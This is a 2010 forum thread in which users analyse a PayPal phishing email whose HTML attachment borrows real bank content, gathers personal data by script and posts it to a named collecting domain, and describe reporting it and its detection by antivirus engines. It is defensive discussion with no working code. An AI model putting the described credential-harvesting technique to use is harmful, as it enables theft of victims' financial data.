Farelf Posted February 8, 2010 Share Posted February 8, 2010 I've totally fallen off the wave when it comes to spam (not getting very much of it with which to keep in touch) but a recent PayPal phish caught my eye as looking comparatively convincing in terms of containing reasonably business-like (brief) text and an attachment full of proper (pilfered) linked content with a sneaky, but of course 'invisible' form processing address - therefore being sure to catch a few unwary souls who forget PPs solemn undertaking to never, ever send mail like that. So, forgive me if it is 'old hat'. The example is: http://www.spamcop.net/sc?id=z3718537564ze...a8157ae5b00fbaz The attachment is an HTML file which pulls down content from PayPal and Bank of America, programmically (java scri_pt) demands just about every piece of personal information imaginable then choofs it off to bugmafia2000.com for 'processing' (which is the invisible part) using a <form action ... method="post"> tag. No doubt the whole thing looks pretty spiffy if opened. Thinking of the consternation caused by 'image' spam some time ago, one has to reflect this is infinitely worse (with a higher hit rate - almost definitely - and easier to modify and maintain). SC of course doesn't touch the "application/octet-stream part" attachment and doesn't get near the criminals' processing site. The From: and Reply-to: addresses are no part of this one (simply spoofed) - everything is handled by the HTML-scripted form. Checking bugmafia2000.com against SC shows that reports aren't/wouldn't be currently sent to either of the reporting addresses identified anyway (unresponsive and/or spammy?). Nasty, nasty. Link to comment Share on other sites More sharing options...
turetzsr Posted February 8, 2010 Share Posted February 8, 2010 <snip> pulls down content from PayPal and Bank of America, programmically <snip> ...You've alerted those honorable institutions, I hope! Link to comment Share on other sites More sharing options...
Farelf Posted February 9, 2010 Author Share Posted February 9, 2010 ...You've alerted those honorable institutions, I hope!Reported at the time (yesterday) to spoof[at] for PayPal as lead party - BOA1 seem to be just incidental, hard to know without looking more deeply and that can be a little dangerous without more knowledge than I have. Time was when you could just change the extension to .doc and look at the HTML code with impunity. I discovered those days are past (MS Word merrily tries to contact every href and src - apparently) need to make it .txt or .rtf and be sure Word hasn't inveigled itself into the default for even those. Life's too short. Spent enough time with 'infernal machines' of the *boom* type, when I hadn't the option, to be disinclined now, when I have the choice, to volunteer staking my meagre wits in second-guessing the designers of the metaphorical equivalents of such. Well, yeah, one enjoys the challenge but ... you know your ego's going to exceed your skill at some point. I did trigger a scan of bugmafia2000.com to be queued at McAfee SiteAdvisor and left a phish alert comment there. Even that took longer than it should have - seems I have progressively tightened up security on several of my browsers to the point where they don't want to do anything except browse now . [Edit] 1Corrected from BOM (Bank of 'Merika? ) but I suppose 'like unto a serpent of the spotted kind' is more proper. Link to comment Share on other sites More sharing options...
Farelf Posted February 24, 2010 Author Share Posted February 24, 2010 Checking the attachment with VirusTotal of another received today, Kapersky thinks it contains/constitutes Trojan-PSW.HTML.PayPal.a - this being the only identification from the 41 AV engines and only added to Kapersky's definitions today. This is a chunk of HTML with embedded scripts and stuff and is trivially altered - that means the hash values can be variable and any virus/spyware detection based on hash "signatures" is always going to be well behind the game. This attachment is a different size from the previous one mentioned. A re-scan of that older one now comes up with a Kapersky (only) hit for Trojan-PSW.HTML.PayPal.a also. I have no idea what sort of detection Kapersky uses but suspect it is not tied to hash signatures. Latest example received a day after using on-line banking. I have a feeling the previous one was too. What me worry? A sufficiently large environment is full of coincidences (whistles, eyeballs at 45 degees to the horizontal - also to the vertical - and 90 degrees from the axial). Take care out there. Yes, PayPal are on the job, spoof[at] having been notified (forward sample as an attachment). Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.